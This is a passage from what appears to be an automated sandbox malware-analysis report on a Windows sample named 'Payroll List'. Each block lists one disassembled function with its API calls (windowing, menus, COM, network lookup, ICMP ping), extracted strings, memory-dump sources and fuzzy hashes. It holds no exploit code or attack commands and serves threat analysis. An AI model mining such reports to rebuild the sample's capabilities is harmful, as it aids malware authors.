                                                                    • GetWindowRect.USER32(00000000,?), ref: 0015EE20
                                                                    • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0015EE63
                                                                    • GetDlgItem.USER32(?,000003EA), ref: 0015EE71
                                                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0015EE8E
                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0015EE9B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Window$ItemMoveRect$Invalidate
                                                                    • String ID:
                                                                    • API String ID: 3096461208-0
                                                                    • Opcode ID: 5e70b664b540b5971dde4bf6dab05d4ffe16a41da18cf6e440e07c85b075a437
                                                                    • Instruction ID: 693f7b49660e8e4a63b6ee4fcb1442b05a3750724369002e29f078de22eac19b
                                                                    • Opcode Fuzzy Hash: 5e70b664b540b5971dde4bf6dab05d4ffe16a41da18cf6e440e07c85b075a437
                                                                    • Instruction Fuzzy Hash: 745133B1B00605EFDB18CF68DD85AAEBBF6FB89311F148129F91AD7690D7709E448B10
                                                                    Function 0013B73E Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0013B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0013B759,?,00000000,?,?,?,?,0013B72B,00000000,?), ref: 0013BA58
                                                                    • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0013B72B), ref: 0013B7F6
                                                                    • KillTimer.USER32(00000000,?,00000000,?,?,?,?,0013B72B,00000000,?,?,0013B2EF,?,?), ref: 0013B88D
                                                                    • DestroyAcceleratorTable.USER32(00000000), ref: 0019D8A6
                                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0013B72B,00000000,?,?,0013B2EF,?,?), ref: 0019D8D7
                                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0013B72B,00000000,?,?,0013B2EF,?,?), ref: 0019D8EE
                                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0013B72B,00000000,?,?,0013B2EF,?,?), ref: 0019D90A
                                                                    • DeleteObject.GDI32(00000000), ref: 0019D91C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                    • String ID:
                                                                    • API String ID: 641708696-0
                                                                    • Opcode ID: cb651a49c326ba520ec6b51551fab4941e130a660d59e7c2da54fe08e0b12e6b
                                                                    • Instruction ID: e0828430cd7737d107dd9601e1759796392228ac625c20f7d3ebfaedb0909c23
                                                                    • Opcode Fuzzy Hash: cb651a49c326ba520ec6b51551fab4941e130a660d59e7c2da54fe08e0b12e6b
                                                                    • Instruction Fuzzy Hash: 8D61AC30505A40EFDB2A9F58E9C8B69B7B5FF99316F15011DE6468AEB0D7B0A8C0CF40
                                                                    Function 0013B40A Relevance: 18.1, APIs: 12, Instructions: 131COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0013B526: GetWindowLongW.USER32(?,000000EB), ref: 0013B537
                                                                    • GetSysColor.USER32(0000000F), ref: 0013B438
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: ColorLongWindow
                                                                    • String ID:
                                                                    • API String ID: 259745315-0
                                                                    • Opcode ID: 7b4620d05f63d72693972c0d43eca96e745d740249377fad2ffae2786e4b4137
                                                                    • Instruction ID: 166c7c9a34b80d05f00853ce86279458a5330d429ce97a9d6c6e47117ec314b1
                                                                    • Opcode Fuzzy Hash: 7b4620d05f63d72693972c0d43eca96e745d740249377fad2ffae2786e4b4137
                                                                    • Instruction Fuzzy Hash: 1E41B430108544AFDF245F28ECC9BB93B65AB06731F184265FE668E9E6E7318C81D726
                                                                    Function 0016690B Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                    • String ID:
                                                                    • API String ID: 136442275-0
                                                                    • Opcode ID: 3048170e2c1ebed5edcce9fdfb9bbd350072424b9098fe4d5a965e75e25124b7
                                                                    • Instruction ID: 04542da1aed3532afbd470e2b335874c317c1e620cb44ae6ebfc5b954a79f918
                                                                    • Opcode Fuzzy Hash: 3048170e2c1ebed5edcce9fdfb9bbd350072424b9098fe4d5a965e75e25124b7
                                                                    • Instruction Fuzzy Hash: 98412E7684511CAECF66DB90CC95DDE73BCEB58310F0041E6FA59A2051EB30ABE98F50
                                                                    Function 0016D76A Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 180COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CharLowerBuffW.USER32(001BDC00,001BDC00,001BDC00), ref: 0016D7CE
                                                                    • GetDriveTypeW.KERNEL32(?,001D3A70,00000061), ref: 0016D898
                                                                    • _wcscpy.LIBCMT ref: 0016D8C2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: BuffCharDriveLowerType_wcscpy
                                                                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                    • API String ID: 2820617543-1000479233
                                                                    • Opcode ID: bb7213e4b0f186111e838f237efd1acceb91744aae01d968876ef5cc9a06143b
                                                                    • Instruction ID: 79b88bee9fee77008406f9d9a0cc404a96600772239385c9114d1d5d7ab2b54b
                                                                    • Opcode Fuzzy Hash: bb7213e4b0f186111e838f237efd1acceb91744aae01d968876ef5cc9a06143b
                                                                    • Instruction Fuzzy Hash: 4551A7356043009FC704EF14EC91A6EB7E5EFA4314F50892DF59A572A2DB31DD15CB82
                                                                    Function 0012936C Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 145COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __swprintf.LIBCMT ref: 001293AB
                                                                    • __itow.LIBCMT ref: 001293DF
                                                                      • Part of subcall function 00141557: _xtow@16.LIBCMT ref: 00141578
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: __itow__swprintf_xtow@16
                                                                    • String ID: %.15g$0x%p$False$True
                                                                    • API String ID: 1502193981-2263619337
                                                                    • Opcode ID: 5f68356940854a768783f4d153b0d9ae8ce4b3d82e2d83f9d257703f70d8b79c
                                                                    • Instruction ID: 17e4f3f6a10e5bbd615312521d98bc3c839d5bb932c75fcb7efb9465a1d4da6c
                                                                    • Opcode Fuzzy Hash: 5f68356940854a768783f4d153b0d9ae8ce4b3d82e2d83f9d257703f70d8b79c
                                                                    • Instruction Fuzzy Hash: 7541E331904214AFEB28DF78E942EAA73E8FF58310F20446EE14AD7291EB31D952CB51
                                                                    Function 0018A1B6 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0018A259
                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 0018A260
                                                                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 0018A273
                                                                    • SelectObject.GDI32(00000000,00000000), ref: 0018A27B
                                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 0018A286
                                                                    • DeleteDC.GDI32(00000000), ref: 0018A28F
                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0018A299
                                                                    • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 0018A2AD
                                                                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0018A2B9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                    • String ID: static
                                                                    • API String ID: 2559357485-2160076837
                                                                    • Opcode ID: 4044b381a15068f4144fae17405df7efe8bfb1beeea6bf0f7b42c6d802b97b83
                                                                    • Instruction ID: 747d7855f9fb6dfcff62b6c73be2337c862615851a4b2e91051976ccf0ccbe9a
                                                                    • Opcode Fuzzy Hash: 4044b381a15068f4144fae17405df7efe8bfb1beeea6bf0f7b42c6d802b97b83
                                                                    • Instruction Fuzzy Hash: 5C319E31100615BBEF21AFA4EC49FEA3B69FF1E360F110215FA1AA64A0C731D951DBA4
                                                                    Function 00166F02 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                    • String ID: 0.0.0.0
                                                                    • API String ID: 2620052-3771769585
                                                                    • Opcode ID: ba904fc83e9954994299f390c591a704db8bf89d981fc3be3654833d2433c7df
                                                                    • Instruction ID: 5172974c0b81651334be50da357e66e95e098fae1e2185b0f4e7fa83e6ffc8a0
                                                                    • Opcode Fuzzy Hash: ba904fc83e9954994299f390c591a704db8bf89d981fc3be3654833d2433c7df
                                                                    • Instruction Fuzzy Hash: D0110672904215ABCB28ABB0EC0AEDA77ACEF55724F0000A9F106E6091FF74DED58B51
                                                                    Function 0014500E Relevance: 16.8, APIs: 11, Instructions: 257COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00145047
                                                                      • Part of subcall function 00147C0E: __getptd_noexit.LIBCMT ref: 00147C0E
                                                                    • __gmtime64_s.LIBCMT ref: 001450E0
                                                                    • __gmtime64_s.LIBCMT ref: 00145116
                                                                    • __gmtime64_s.LIBCMT ref: 00145133
                                                                    • __allrem.LIBCMT ref: 00145189
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001451A5
                                                                    • __allrem.LIBCMT ref: 001451BC
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001451DA
                                                                    • __allrem.LIBCMT ref: 001451F1
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0014520F
                                                                    • __invoke_watson.LIBCMT ref: 00145280
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                    • String ID:
                                                                    • API String ID: 384356119-0
                                                                    • Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                    • Instruction ID: 05b4aeaa86b5aefc64eb344d36dcc973fe866d0e9ecb0c6fa4f0d6a7a372ca33
                                                                    • Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                    • Instruction Fuzzy Hash: 89710776A00F17EBE7149E78CC41BAA73AAAF11764F14422AF914DB293E770DD408BD0
                                                                    Function 00164DDD Relevance: 16.7, APIs: 11, Instructions: 189windowsleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00164DF8
                                                                    • GetMenuItemInfoW.USER32(001E1708,000000FF,00000000,00000030), ref: 00164E59
                                                                    • SetMenuItemInfoW.USER32(001E1708,00000004,00000000,00000030), ref: 00164E8F
                                                                    • Sleep.KERNEL32(000001F4), ref: 00164EA1
                                                                    • GetMenuItemCount.USER32(?), ref: 00164EE5
                                                                    • GetMenuItemID.USER32(?,00000000), ref: 00164F01
                                                                    • GetMenuItemID.USER32(?,-00000001), ref: 00164F2B
                                                                    • GetMenuItemID.USER32(?,?), ref: 00164F70
                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00164FB6
                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00164FCA
                                                                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00164FEB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                    • String ID:
                                                                    • API String ID: 4176008265-0
                                                                    • Opcode ID: 54e4edb613714167c61a62bebe5aafb0fb28881c8d1fff272edc6898bee48544
                                                                    • Instruction ID: 5024e668a13737d3b5b89bb0bc2b7fabb58b88c996756a2e8ef6722719b28acd
                                                                    • Opcode Fuzzy Hash: 54e4edb613714167c61a62bebe5aafb0fb28881c8d1fff272edc6898bee48544
                                                                    • Instruction Fuzzy Hash: 6B61B2B1900289EFDB25CFA8DC88EBE7BB9FB05304F144099F442A7651D731AD65CB60
                                                                    Function 00189C16 Relevance: 16.7, APIs: 11, Instructions: 183windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00189C98
                                                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00189C9B
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00189CBF
                                                                    • _memset.LIBCMT ref: 00189CD0
                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00189CE2
                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00189D5A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$LongWindow_memset
                                                                    • String ID:
                                                                    • API String ID: 830647256-0
                                                                    • Opcode ID: 5c81d73306e0cd7edca5984b16ac4114c9eb79df9e9cbc9da400ecf40e6bc893
                                                                    • Instruction ID: 55d84f8f294c9bc6492b5f0e8840570d0719c476ae9083f74a92fc9937e0beaf
                                                                    • Opcode Fuzzy Hash: 5c81d73306e0cd7edca5984b16ac4114c9eb79df9e9cbc9da400ecf40e6bc893
                                                                    • Instruction Fuzzy Hash: A8616B75900248AFDB11DFA8CC81EFEB7B8EB09714F184159FA15AB2A1D770AE42DF50
                                                                    Function 001594E1 Relevance: 16.6, APIs: 11, Instructions: 109memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 001594FE
                                                                    • SafeArrayAllocData.OLEAUT32(?), ref: 00159549
                                                                    • VariantInit.OLEAUT32(?), ref: 0015955B
                                                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 0015957B
                                                                    • VariantCopy.OLEAUT32(?,?), ref: 001595BE
                                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 001595D2
                                                                    • VariantClear.OLEAUT32(?), ref: 001595E7
                                                                    • SafeArrayDestroyData.OLEAUT32(?), ref: 001595F4
                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 001595FD
                                                                    • VariantClear.OLEAUT32(?), ref: 0015960F
                                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0015961A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                    • String ID:
                                                                    • API String ID: 2706829360-0
                                                                    • Opcode ID: 9f509102ccce549ef53d10e57b10e8989e4948616727104cffa978e037c9c455
                                                                    • Instruction ID: 9ed03e5be3a69f0a3547cc827d4686679e9c4ccde787452850ef45445a5562a9
                                                                    • Opcode Fuzzy Hash: 9f509102ccce549ef53d10e57b10e8989e4948616727104cffa978e037c9c455
                                                                    • Instruction Fuzzy Hash: 51415D75A00219EFCB01EFA4DC449DEBF79FF08355F008065F912A7A51DB30AA89CBA1
                                                                    Function 0017ADAE Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0012936C: __swprintf.LIBCMT ref: 001293AB
                                                                      • Part of subcall function 0012936C: __itow.LIBCMT ref: 001293DF
                                                                    • CoInitialize.OLE32 ref: 0017ADF6
                                                                    • CoUninitialize.OLE32 ref: 0017AE01
                                                                    • CoCreateInstance.OLE32(?,00000000,00000017,001AD8FC,?), ref: 0017AE61
                                                                    • IIDFromString.OLE32(?,?), ref: 0017AED4
                                                                    • VariantInit.OLEAUT32(?), ref: 0017AF6E
                                                                    • VariantClear.OLEAUT32(?), ref: 0017AFCF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                    • API String ID: 834269672-1287834457
                                                                    • Opcode ID: 7fff75d42885b0ec0778e02fddbea5bf3427d9573af70216db143526d092ceec
                                                                    • Instruction ID: 354a6fe9a7a89f88c3e4fc671e29ec043ed53b7c2f105b9b2e6b0faef9d5fbc4
                                                                    • Opcode Fuzzy Hash: 7fff75d42885b0ec0778e02fddbea5bf3427d9573af70216db143526d092ceec
                                                                    • Instruction Fuzzy Hash: F6618C70208711AFD711DF64D888B6EBBF8AF89714F508519F98A9B291CB70ED44CB93
                                                                    Function 00178107 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • WSAStartup.WSOCK32(00000101,?), ref: 00178168
                                                                    • inet_addr.WSOCK32(?,?,?), ref: 001781AD
                                                                    • gethostbyname.WSOCK32(?), ref: 001781B9
                                                                    • IcmpCreateFile.IPHLPAPI ref: 001781C7
                                                                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00178237
                                                                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 0017824D
                                                                    • IcmpCloseHandle.IPHLPAPI(00000000), ref: 001782C2
                                                                    • WSACleanup.WSOCK32 ref: 001782C8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                    • String ID: Ping
                                                                    • API String ID: 1028309954-2246546115
                                                                    • Opcode ID: a953cc5705d18aea3dbe8b260b932945098b00ca7c08f295c23242ef042b4411
                                                                    • Instruction ID: 313ebb0325d9ce6da171fbcc343e92ef2c51f6ed557c2d288182de6d9426aa9e
